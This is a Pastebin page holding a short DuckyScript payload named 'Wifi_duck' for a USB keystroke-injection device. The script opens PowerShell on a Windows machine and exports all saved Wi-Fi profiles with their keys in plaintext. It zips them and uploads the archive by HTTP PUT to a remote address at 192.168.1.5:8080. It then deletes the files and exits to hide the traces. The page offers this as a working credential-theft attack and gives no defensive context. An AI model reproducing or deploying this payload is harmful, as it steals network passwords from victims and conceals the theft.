Skeleton022

Wifi_duck

May 12th, 2021 (edited)
358
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.64 KB | None | 0 0
  1. DELAY 2222
  2. GUI r
  3. DELAY 200
  4. STRING powershell
  5. ENTER
  6. DELAY 500
  7. REM To remove the win+r history
  8. REM STRING powershell "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
  9. ENTER
  10. DELAY 2000
  11. STRING netsh wlan export profile key=clear
  12. ENTER
  13. STRING Compress-Archive -U -Path .\*.xml -DestinationPath .\temp.zip
  14. ENTER
  15. DELAY 3000
  16. STRING $r=[System.IO.Path]::GetRandomFileName()
  17. ENTER
  18. STRING Invoke-Restmethod -Uri http://192.168.1.5:8080/QjaDb8fW2O/temp.zip -Method Put -Infile .\temp.zip
  19. ENTER
  20. DELAY 2000
  21. STRING rm .\temp.zip
  22. ENTER
  23. STRING rm .\*.xml
  24. ENTER
  25. STRING exit
  26. ENTER
Add Comment
Please, Sign In to add comment